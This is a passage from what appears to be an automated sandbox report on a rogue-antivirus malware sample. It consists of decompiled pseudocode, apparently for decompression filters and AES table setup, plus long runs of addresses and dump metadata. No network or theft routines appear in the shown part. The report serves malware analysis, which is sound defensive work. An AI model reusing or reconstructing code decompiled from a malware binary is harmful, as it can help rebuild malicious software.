                                                                                                                                                  											if(_t287 == 0) {
                                                                                                                                                  												__eflags = _v8 - 0xfffffff0;
                                                                                                                                                  												if(_v8 >= 0xfffffff0) {
                                                                                                                                                  													_v8 = _v8 - 1;
                                                                                                                                                  												}
                                                                                                                                                  											} else {
                                                                                                                                                  												_t288 = _t287 - 1;
                                                                                                                                                  												__eflags = _t288;
                                                                                                                                                  												if(_t288 == 0) {
                                                                                                                                                  													__eflags = _v8 - 0x10;
                                                                                                                                                  													if(_v8 < 0x10) {
                                                                                                                                                  														_v8 = _v8 + 1;
                                                                                                                                                  													}
                                                                                                                                                  												} else {
                                                                                                                                                  													_t289 = _t288 - 1;
                                                                                                                                                  													__eflags = _t289;
                                                                                                                                                  													if(_t289 == 0) {
                                                                                                                                                  														__eflags = _a4 - 0xfffffff0;
                                                                                                                                                  														if(_a4 >= 0xfffffff0) {
                                                                                                                                                  															_a4 = _a4 - 1;
                                                                                                                                                  														}
                                                                                                                                                  													} else {
                                                                                                                                                  														__eflags = _t289 == 1;
                                                                                                                                                  														if(_t289 == 1) {
                                                                                                                                                  															__eflags = _a4 - 0x10;
                                                                                                                                                  															if(_a4 < 0x10) {
                                                                                                                                                  																_a4 = _a4 + 1;
                                                                                                                                                  															}
                                                                                                                                                  														}
                                                                                                                                                  													}
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									goto L49;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						_v20 = _v20 + 1;
                                                                                                                                                  						_t227 = _v20;
                                                                                                                                                  						__eflags = _t227 - _v48;
                                                                                                                                                  						if(_t227 < _v48) {
                                                                                                                                                  							_t355 = _v44;
                                                                                                                                                  							_t300 = 0;
                                                                                                                                                  							__eflags = 0;
                                                                                                                                                  							L25:
                                                                                                                                                  							_v40 = _t300;
                                                                                                                                                  							_v36 = _t300;
                                                                                                                                                  							_v16 = _t300;
                                                                                                                                                  							_v12 = _t300;
                                                                                                                                                  							_v8 = _t300;
                                                                                                                                                  							_a4 = _t300;
                                                                                                                                                  							E0040A289(_t318,  &_v84, _t300, 0x1c);
                                                                                                                                                  							_t260 = _v20;
                                                                                                                                                  							_v32 = _v32 & 0x00000000;
                                                                                                                                                  							__eflags = _t260 - _t355;
                                                                                                                                                  							goto L50;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					goto L97;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t330 == 6) {
                                                                                                                                                  					_t328 =  *(__ecx + 0x20);
                                                                                                                                                  					_t227 =  *(__ecx + 0x10);
                                                                                                                                                  					_t301 = 0;
                                                                                                                                                  					_v32 = _t227;
                                                                                                                                                  					_t344 = _t328 + _t328;
                                                                                                                                                  					( *(__ecx + 0xc))[0xf008] = _t328;
                                                                                                                                                  					__eflags = _t328 - 0x1e000;
                                                                                                                                                  					if(_t328 >= 0x1e000) {
                                                                                                                                                  						goto L97;
                                                                                                                                                  					}
                                                                                                                                                  					_a4 = _a4 & 0;
                                                                                                                                                  					__eflags = _t227;
                                                                                                                                                  					if(_t227 <= 0) {
                                                                                                                                                  						goto L97;
                                                                                                                                                  					} else {
                                                                                                                                                  						goto L16;
                                                                                                                                                  					}
                                                                                                                                                  					do {
                                                                                                                                                  						L16:
                                                                                                                                                  						_t291 = 0;
                                                                                                                                                  						_t360 = _a4 + _t328;
                                                                                                                                                  						L18:
                                                                                                                                                  						__eflags = _t360 - _t344;
                                                                                                                                                  						if(_t360 < _t344) {
                                                                                                                                                  							_t345 =  *(_t364 + 0xc);
                                                                                                                                                  							_t291 = _t291 -  *((intOrPtr*)(_t345 + _t301));
                                                                                                                                                  							_t301 = _t301 + 1;
                                                                                                                                                  							 *((char*)(_t345 + _t360)) = _t291;
                                                                                                                                                  							_t360 = _t360 + _v32;
                                                                                                                                                  							__eflags = _t360;
                                                                                                                                                  							_t344 = _t328 + _t328;
                                                                                                                                                  							goto L18;
                                                                                                                                                  						}
                                                                                                                                                  						_a4 = _a4 + 1;
                                                                                                                                                  						_t227 = _a4;
                                                                                                                                                  						__eflags = _t227 - _v32;
                                                                                                                                                  					} while (_t227 < _v32);
                                                                                                                                                  					goto L97;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t330 != 7) {
                                                                                                                                                  					goto L97;
                                                                                                                                                  				}
                                                                                                                                                  				_t302 =  *(__ecx + 0x20);
                                                                                                                                                  				_t346 = 0;
                                                                                                                                                  				_t361 = _t302;
                                                                                                                                                  				if(_t302 >= 0x1e000) {
                                                                                                                                                  					goto L97;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t302 <= 0) {
                                                                                                                                                  					L13:
                                                                                                                                                  					 *((intOrPtr*)( *(_t364 + 0xc) + 0x3c01c)) = _t361 - _t302;
                                                                                                                                                  					_t227 =  *(_t364 + 0xc);
                                                                                                                                                  					 *(_t227 + 0x3c020) = _t302;
                                                                                                                                                  					goto L97;
                                                                                                                                                  				} else {
                                                                                                                                                  					goto L9;
                                                                                                                                                  				}
                                                                                                                                                  				do {
                                                                                                                                                  					L9:
                                                                                                                                                  					_t293 =  *(_t364 + 0xc);
                                                                                                                                                  					_t329 =  *((intOrPtr*)(_t293 + _t346));
                                                                                                                                                  					_t346 = _t346 + 1;
                                                                                                                                                  					if(_t329 == 2) {
                                                                                                                                                  						_t329 =  *((intOrPtr*)(_t293 + _t346));
                                                                                                                                                  						_t346 = _t346 + 1;
                                                                                                                                                  						if(_t329 != 2) {
                                                                                                                                                  							_t329 = _t329 + 0xe0;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					 *((char*)(_t293 + _t361)) = _t329;
                                                                                                                                                  					_t361 = _t361 + 1;
                                                                                                                                                  				} while (_t346 < _t302);
                                                                                                                                                  				goto L13;
                                                                                                                                                  			}

















































































                                                                                                                                                  0x00407e11
                                                                                                                                                  0x00407e14
                                                                                                                                                  0x00407e18
                                                                                                                                                  0x00407e1c
                                                                                                                                                  0x004082ff
                                                                                                                                                  0x00408301
                                                                                                                                                  0x00408301
                                                                                                                                                  0x00407e27
                                                                                                                                                  0x00408297
                                                                                                                                                  0x0040829a
                                                                                                                                                  0x0040829d
                                                                                                                                                  0x004082a0
                                                                                                                                                  0x004082a5
                                                                                                                                                  0x004082fd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004082fe
                                                                                                                                                  0x004082a7
                                                                                                                                                  0x004082aa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004082ac
                                                                                                                                                  0x004082b2
                                                                                                                                                  0x004082b6
                                                                                                                                                  0x004082b9
                                                                                                                                                  0x004082bc
                                                                                                                                                  0x004082be
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004082c0
                                                                                                                                                  0x004082c0
                                                                                                                                                  0x004082c0
                                                                                                                                                  0x004082c2
                                                                                                                                                  0x004082c3
                                                                                                                                                  0x004082c6
                                                                                                                                                  0x004082c7
                                                                                                                                                  0x004082c9
                                                                                                                                                  0x004082cf
                                                                                                                                                  0x004082cf
                                                                                                                                                  0x004082d1
                                                                                                                                                  0x004082d3
                                                                                                                                                  0x004082e3
                                                                                                                                                  0x004082e8
                                                                                                                                                  0x004082ee
                                                                                                                                                  0x004082ee
                                                                                                                                                  0x004082f2
                                                                                                                                                  0x004082f5
                                                                                                                                                  0x004082f5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004082f5
                                                                                                                                                  0x004082ea
                                                                                                                                                  0x004082ea
                                                                                                                                                  0x004082ec
                                                                                                                                                  0x004082ec
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004082ec
                                                                                                                                                  0x004082d8
                                                                                                                                                  0x004082da
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004082dc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004082dc
                                                                                                                                                  0x004082cb
                                                                                                                                                  0x004082cd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004082f8
                                                                                                                                                  0x004082f8
                                                                                                                                                  0x004082f8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004082c0
                                                                                                                                                  0x00407e30
                                                                                                                                                  0x004081e2
                                                                                                                                                  0x004081e5
                                                                                                                                                  0x004081e8
                                                                                                                                                  0x004081ed
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004081f3
                                                                                                                                                  0x004081f6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004081ff
                                                                                                                                                  0x00408202
                                                                                                                                                  0x00408205
                                                                                                                                                  0x00408207
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00408211
                                                                                                                                                  0x00408211
                                                                                                                                                  0x00408212
                                                                                                                                                  0x00408215
                                                                                                                                                  0x0040821e
                                                                                                                                                  0x0040821e
                                                                                                                                                  0x00408221
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00408223
                                                                                                                                                  0x00408229
                                                                                                                                                  0x0040822b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040822d
                                                                                                                                                  0x0040822d
                                                                                                                                                  0x0040822d
                                                                                                                                                  0x00408236
                                                                                                                                                  0x00408239
                                                                                                                                                  0x0040823a
                                                                                                                                                  0x00408240
                                                                                                                                                  0x00408242
                                                                                                                                                  0x00408245
                                                                                                                                                  0x00408247
                                                                                                                                                  0x0040824b
                                                                                                                                                  0x00408254
                                                                                                                                                  0x00408259
                                                                                                                                                  0x0040825c
                                                                                                                                                  0x00408270
                                                                                                                                                  0x0040827b
                                                                                                                                                  0x0040827b
                                                                                                                                                  0x0040825c
                                                                                                                                                  0x00408280
                                                                                                                                                  0x00408283
                                                                                                                                                  0x00408286
                                                                                                                                                  0x00408286
                                                                                                                                                  0x0040828b
                                                                                                                                                  0x0040828b
                                                                                                                                                  0x0040828f
                                                                                                                                                  0x00408290
                                                                                                                                                  0x00408290
                                                                                                                                                  0x00408290
                                                                                                                                                  0x00408290
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00408295
                                                                                                                                                  0x00407e39
                                                                                                                                                  0x004080c7
                                                                                                                                                  0x004080cd
                                                                                                                                                  0x004080d0
                                                                                                                                                  0x004080d3
                                                                                                                                                  0x004080d6
                                                                                                                                                  0x004080d9
                                                                                                                                                  0x004080dc
                                                                                                                                                  0x004080df
                                                                                                                                                  0x004080e2
                                                                                                                                                  0x004080e5
                                                                                                                                                  0x004080eb
                                                                                                                                                  0x004080f0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004080f6
                                                                                                                                                  0x004080f8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004080fe
                                                                                                                                                  0x004080fe
                                                                                                                                                  0x004080fe
                                                                                                                                                  0x00408104
                                                                                                                                                  0x00408107
                                                                                                                                                  0x00408107
                                                                                                                                                  0x0040810a
                                                                                                                                                  0x0040810e
                                                                                                                                                  0x00408111
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00408117
                                                                                                                                                  0x0040811d
                                                                                                                                                  0x00408120
                                                                                                                                                  0x00408127
                                                                                                                                                  0x0040812a
                                                                                                                                                  0x0040812a
                                                                                                                                                  0x0040812b
                                                                                                                                                  0x0040812e
                                                                                                                                                  0x0040812e
                                                                                                                                                  0x00408132
                                                                                                                                                  0x0040818a
                                                                                                                                                  0x0040818a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040818a
                                                                                                                                                  0x00408134
                                                                                                                                                  0x00408137
                                                                                                                                                  0x0040813b
                                                                                                                                                  0x00408143
                                                                                                                                                  0x00408151
                                                                                                                                                  0x00408162
                                                                                                                                                  0x00408166
                                                                                                                                                  0x0040816e
                                                                                                                                                  0x00408171
                                                                                                                                                  0x00408174
                                                                                                                                                  0x0040817b
                                                                                                                                                  0x0040817b
                                                                                                                                                  0x0040817e
                                                                                                                                                  0x00408185
                                                                                                                                                  0x00408180
                                                                                                                                                  0x00408180
                                                                                                                                                  0x00408180
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040817e
                                                                                                                                                  0x00408176
                                                                                                                                                  0x00408179
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040818d
                                                                                                                                                  0x00408195
                                                                                                                                                  0x00408198
                                                                                                                                                  0x0040819c
                                                                                                                                                  0x0040819f
                                                                                                                                                  0x004081a2
                                                                                                                                                  0x004081a5
                                                                                                                                                  0x004081a5
                                                                                                                                                  0x004081a5
                                                                                                                                                  0x004081a8
                                                                                                                                                  0x004081a8
                                                                                                                                                  0x004081ad
                                                                                                                                                  0x004081ad
                                                                                                                                                  0x004081b0
                                                                                                                                                  0x004081b3
                                                                                                                                                  0x004081b3
                                                                                                                                                  0x004081c0
                                                                                                                                                  0x004081c3
                                                                                                                                                  0x004081d6
                                                                                                                                                  0x004081d6
                                                                                                                                                  0x004081d8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004081c8
                                                                                                                                                  0x004081cc
                                                                                                                                                  0x004081cf
                                                                                                                                                  0x004081d3
                                                                                                                                                  0x004081d3
                                                                                                                                                  0x004081d3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004081da
                                                                                                                                                  0x00407e42
                                                                                                                                                  0x00407f01
                                                                                                                                                  0x00407f04
                                                                                                                                                  0x00407f07
                                                                                                                                                  0x00407f0a
                                                                                                                                                  0x00407f0d
                                                                                                                                                  0x00407f10
                                                                                                                                                  0x00407f13
                                                                                                                                                  0x00407f16
                                                                                                                                                  0x00407f19
                                                                                                                                                  0x00407f1f
                                                                                                                                                  0x00407f25
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407f2b
                                                                                                                                                  0x00407f2d
                                                                                                                                                  0x00407f2f
                                                                                                                                                  0x00407f32
                                                                                                                                                  0x00407f38
                                                                                                                                                  0x004080aa
                                                                                                                                                  0x004080aa
                                                                                                                                                  0x004080aa
                                                                                                                                                  0x004080ad
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407f6b
                                                                                                                                                  0x00407f76
                                                                                                                                                  0x00407f78
                                                                                                                                                  0x00407f80
                                                                                                                                                  0x00407f91
                                                                                                                                                  0x00407f96
                                                                                                                                                  0x00407f99
                                                                                                                                                  0x00407fa5
                                                                                                                                                  0x00407fad
                                                                                                                                                  0x00407fb2
                                                                                                                                                  0x00407fbd
                                                                                                                                                  0x00407fc0
                                                                                                                                                  0x00407fc4
                                                                                                                                                  0x00407fc7
                                                                                                                                                  0x00407fcf
                                                                                                                                                  0x00407fdd
                                                                                                                                                  0x00407feb
                                                                                                                                                  0x00407ff8
                                                                                                                                                  0x00408004
                                                                                                                                                  0x00408011
                                                                                                                                                  0x0040801c
                                                                                                                                                  0x0040801f
                                                                                                                                                  0x00408022
                                                                                                                                                  0x00408026
                                                                                                                                                  0x0040809e
                                                                                                                                                  0x004080a1
                                                                                                                                                  0x004080a4
                                                                                                                                                  0x004080a7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00408028
                                                                                                                                                  0x00408028
                                                                                                                                                  0x0040802b
                                                                                                                                                  0x0040802f
                                                                                                                                                  0x00408032
                                                                                                                                                  0x00408032
                                                                                                                                                  0x00408032
                                                                                                                                                  0x00408041
                                                                                                                                                  0x00408041
                                                                                                                                                  0x00408044
                                                                                                                                                  0x00408045
                                                                                                                                                  0x00408048
                                                                                                                                                  0x00408033
                                                                                                                                                  0x00408033
                                                                                                                                                  0x00408037
                                                                                                                                                  0x00408039
                                                                                                                                                  0x0040803b
                                                                                                                                                  0x0040803d
                                                                                                                                                  0x0040803f
                                                                                                                                                  0x0040803f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040804a
                                                                                                                                                  0x0040804c
                                                                                                                                                  0x0040804c
                                                                                                                                                  0x0040804d
                                                                                                                                                  0x00408095
                                                                                                                                                  0x00408099
                                                                                                                                                  0x0040809b
                                                                                                                                                  0x0040809b
                                                                                                                                                  0x0040809b
                                                                                                                                                  0x0040809b
                                                                                                                                                  0x0040804f
                                                                                                                                                  0x0040804f
                                                                                                                                                  0x0040804f
                                                                                                                                                  0x00408050
                                                                                                                                                  0x0040808a
                                                                                                                                                  0x0040808e
                                                                                                                                                  0x00408090
                                                                                                                                                  0x00408090
                                                                                                                                                  0x00408052
                                                                                                                                                  0x00408052
                                                                                                                                                  0x00408052
                                                                                                                                                  0x00408053
                                                                                                                                                  0x0040807f
                                                                                                                                                  0x00408083
                                                                                                                                                  0x00408085
                                                                                                                                                  0x00408085
                                                                                                                                                  0x00408055
                                                                                                                                                  0x00408055
                                                                                                                                                  0x00408055
                                                                                                                                                  0x00408056
                                                                                                                                                  0x00408074
                                                                                                                                                  0x00408078
                                                                                                                                                  0x0040807a
                                                                                                                                                  0x0040807a
                                                                                                                                                  0x00408058
                                                                                                                                                  0x00408058
                                                                                                                                                  0x00408058
                                                                                                                                                  0x00408059
                                                                                                                                                  0x00408069
                                                                                                                                                  0x0040806d
                                                                                                                                                  0x0040806f
                                                                                                                                                  0x0040806f
                                                                                                                                                  0x0040805b
                                                                                                                                                  0x0040805b
                                                                                                                                                  0x0040805c
                                                                                                                                                  0x0040805e
                                                                                                                                                  0x00408062
                                                                                                                                                  0x00408064
                                                                                                                                                  0x00408064
                                                                                                                                                  0x00408062
                                                                                                                                                  0x0040805c
                                                                                                                                                  0x00408059
                                                                                                                                                  0x00408056
                                                                                                                                                  0x00408053
                                                                                                                                                  0x00408050
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040804d
                                                                                                                                                  0x00408048
                                                                                                                                                  0x00408026
                                                                                                                                                  0x004080b3
                                                                                                                                                  0x004080b6
                                                                                                                                                  0x004080b9
                                                                                                                                                  0x004080bc
                                                                                                                                                  0x00407f3a
                                                                                                                                                  0x00407f3d
                                                                                                                                                  0x00407f3d
                                                                                                                                                  0x00407f3f
                                                                                                                                                  0x00407f46
                                                                                                                                                  0x00407f49
                                                                                                                                                  0x00407f4c
                                                                                                                                                  0x00407f4f
                                                                                                                                                  0x00407f52
                                                                                                                                                  0x00407f55
                                                                                                                                                  0x00407f58
                                                                                                                                                  0x00407f5d
                                                                                                                                                  0x00407f60
                                                                                                                                                  0x00407f64
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407f64
                                                                                                                                                  0x004080c2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407f32
                                                                                                                                                  0x00407e4b
                                                                                                                                                  0x00407ea6
                                                                                                                                                  0x00407ea9
                                                                                                                                                  0x00407eaf
                                                                                                                                                  0x00407eb1
                                                                                                                                                  0x00407eb4
                                                                                                                                                  0x00407eb7
                                                                                                                                                  0x00407ebd
                                                                                                                                                  0x00407ec3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407ec9
                                                                                                                                                  0x00407ecc
                                                                                                                                                  0x00407ece
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407ed4
                                                                                                                                                  0x00407ed4
                                                                                                                                                  0x00407ed7
                                                                                                                                                  0x00407ed9
                                                                                                                                                  0x00407eed
                                                                                                                                                  0x00407eed
                                                                                                                                                  0x00407eef
                                                                                                                                                  0x00407edd
                                                                                                                                                  0x00407ee0
                                                                                                                                                  0x00407ee3
                                                                                                                                                  0x00407ee4
                                                                                                                                                  0x00407ee7
                                                                                                                                                  0x00407ee7
                                                                                                                                                  0x00407eea
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407eea
                                                                                                                                                  0x00407ef1
                                                                                                                                                  0x00407ef4
                                                                                                                                                  0x00407ef7
                                                                                                                                                  0x00407ef7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407ed4
                                                                                                                                                  0x00407e50
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407e56
                                                                                                                                                  0x00407e59
                                                                                                                                                  0x00407e5b
                                                                                                                                                  0x00407e63
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407e6b
                                                                                                                                                  0x00407e8d
                                                                                                                                                  0x00407e92
                                                                                                                                                  0x00407e98
                                                                                                                                                  0x00407e9b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407e6d
                                                                                                                                                  0x00407e6d
                                                                                                                                                  0x00407e6d
                                                                                                                                                  0x00407e70
                                                                                                                                                  0x00407e73
                                                                                                                                                  0x00407e77
                                                                                                                                                  0x00407e79
                                                                                                                                                  0x00407e7c
                                                                                                                                                  0x00407e80
                                                                                                                                                  0x00407e82
                                                                                                                                                  0x00407e82
                                                                                                                                                  0x00407e80
                                                                                                                                                  0x00407e85
                                                                                                                                                  0x00407e88
                                                                                                                                                  0x00407e89
                                                                                                                                                  0x00000000

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 793eb8acfe7b56b9e0e2ffda27fff7268e03f0766cdb39e56d671b486faabcc2
                                                                                                                                                  • Instruction ID: a767dd345aae43465a873efd591c8ff9a8f9b96ad8d492f56da380bf2bc35be0
                                                                                                                                                  • Opcode Fuzzy Hash: 793eb8acfe7b56b9e0e2ffda27fff7268e03f0766cdb39e56d671b486faabcc2
                                                                                                                                                  • Instruction Fuzzy Hash: 00F18E31D006099FCB14CFA9C5845AEBBB1FF49314F24857FD996B7282DB38A941CB89
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                                  			E00409DE0() {
                                                                                                                                                  				signed char _v8;
                                                                                                                                                  				char _v521;
                                                                                                                                                  				signed int _t98;
                                                                                                                                                  				signed int _t100;
                                                                                                                                                  				signed int _t102;
                                                                                                                                                  				signed char _t105;
                                                                                                                                                  				signed char _t106;
                                                                                                                                                  				char _t107;
                                                                                                                                                  				void* _t108;
                                                                                                                                                  				signed char _t119;
                                                                                                                                                  				signed int _t120;
                                                                                                                                                  				signed int _t129;
                                                                                                                                                  				signed char* _t155;
                                                                                                                                                  				signed int _t156;
                                                                                                                                                  				signed int _t161;
                                                                                                                                                  				signed int _t162;
                                                                                                                                                  				signed int _t163;
                                                                                                                                                  				signed int _t164;
                                                                                                                                                  				signed int _t181;
                                                                                                                                                  				signed int _t182;
                                                                                                                                                  				void* _t183;
                                                                                                                                                  
                                                                                                                                                  				_t107 = 0;
                                                                                                                                                  				_t98 = 1;
                                                                                                                                                  				do {
                                                                                                                                                  					 *(_t183 + _t107 - 0x304) = _t98;
                                                                                                                                                  					 *(_t183 + _t107 - 0x205) = _t98;
                                                                                                                                                  					 *((char*)(_t183 + _t98 - 0x104)) = _t107;
                                                                                                                                                  					_t107 = _t107 + 1;
                                                                                                                                                  					asm("sbb edx, edx");
                                                                                                                                                  					_t98 = _t98 ^  ~(_t98 & 0x00000080) & 0x0000011b ^ _t98 + _t98;
                                                                                                                                                  				} while (_t98 != 1);
                                                                                                                                                  				_t108 = 0;
                                                                                                                                                  				do {
                                                                                                                                                  					asm("sbb edx, edx");
                                                                                                                                                  					 *(_t108 + 0x418ca8) = _t98;
                                                                                                                                                  					_t98 = _t98 + _t98 ^  ~(_t98 & 0x00000080) & 0x0000011b;
                                                                                                                                                  					_t108 = _t108 + 1;
                                                                                                                                                  				} while (_t108 < 0x1e);
                                                                                                                                                  				_t105 = 0;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				L6:
                                                                                                                                                  				L6:
                                                                                                                                                  				if(_t105 == 0) {
                                                                                                                                                  					_t100 = 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t100 =  *( &_v521 - ( *(_t183 + (_t105 & 0x000000ff) - 0x104) & 0x000000ff)) & 0x000000ff;
                                                                                                                                                  				}
                                                                                                                                                  				_t119 = (_t100 ^ (((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) + ((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) ^ _t100) + (((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) + ((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) ^ _t100)) >> 0x00000008 ^ _t100 ^ (((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) + ((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) ^ _t100) + (((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) + ((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) ^ _t100) ^ 0x00000063;
                                                                                                                                                  				_t102 = _t105 * 4;
                                                                                                                                                  				_t16 = _t102 + 0x417ca8; // 0x417ca8
                                                                                                                                                  				_t155 = _t16;
                                                                                                                                                  				 *(_t105 + 0x418dc8) = _t119;
                                                                                                                                                  				_t155[1] = _t119;
                                                                                                                                                  				 *_t155 = _t119;
                                                                                                                                                  				 *(_t102 + 0x4180ab) = _t119;
                                                                                                                                                  				 *(_t102 + 0x4180a8) = _t119;
                                                                                                                                                  				 *(_t102 + 0x4184ab) = _t119;
                                                                                                                                                  				 *(_t102 + 0x4184aa) = _t119;
                                                                                                                                                  				 *(_t102 + 0x4188aa) = _t119;
                                                                                                                                                  				 *(_t102 + 0x4188a9) = _t119;
                                                                                                                                                  				if(_t119 == 0) {
                                                                                                                                                  					_t156 = 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t156 =  *(_t183 + ( *(_t183 + (_t119 & 0x000000ff) - 0x104) & 0x000000ff) - 0x2eb) & 0x000000ff;
                                                                                                                                                  				}
                                                                                                                                                  				 *(_t102 + 0x417cab) = _t156;
                                                                                                                                                  				 *(_t102 + 0x4180aa) = _t156;
                                                                                                                                                  				 *(_t102 + 0x4184a9) = _t156;
                                                                                                                                                  				 *(_t102 + 0x4188a8) = _t156;
                                                                                                                                                  				if(_t119 == 0) {
                                                                                                                                                  					_t120 = 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t120 =  *(_t183 + ( *(_t183 + (_t119 & 0x000000ff) - 0x104) & 0x000000ff) - 0x303) & 0x000000ff;
                                                                                                                                                  				}
                                                                                                                                                  				 *(_t102 + 0x417caa) = _t120;
                                                                                                                                                  				 *(_t102 + 0x4180a9) = _t120;
                                                                                                                                                  				 *(_t102 + 0x4184a8) = _t120;
                                                                                                                                                  				 *(_t102 + 0x4188ab) = _t120;
                                                                                                                                                  				_t181 = _t105 & 0x000000ff;
                                                                                                                                                  				if((((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) + ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) >> 0x00000008 ^ ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) + ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) ^ 0x00000005) == 0) {
                                                                                                                                                  					_t106 = 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t106 =  *((intOrPtr*)( &_v521 - ( *(_t183 + (((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) + ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) >> 0x00000008 & 0x000000ff ^ ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) + ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) & 0x000000ff ^ 0x00000005) - 0x104) & 0x000000ff)));
                                                                                                                                                  				}
                                                                                                                                                  				 *(_v8 + 0x418cc8) = _t106;
                                                                                                                                                  				if(_t106 == 0) {
                                                                                                                                                  					_t161 = 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t161 =  *(_t183 + ( *(_t183 + (_t106 & 0x000000ff) - 0x104) & 0x000000ff) - 0x29c) & 0x000000ff;
                                                                                                                                                  				}
                                                                                                                                                  				_t182 = _t106 & 0x000000ff;
                                                                                                                                                  				_t129 = _t182 << 2;
                                                                                                                                                  				 *(_t102 + 0x416caa) = _t161;
                                                                                                                                                  				 *(_t102 + 0x4170a9) = _t161;
                                                                                                                                                  				 *(_t102 + 0x4174a8) = _t161;
                                                                                                                                                  				 *(_t102 + 0x4178ab) = _t161;
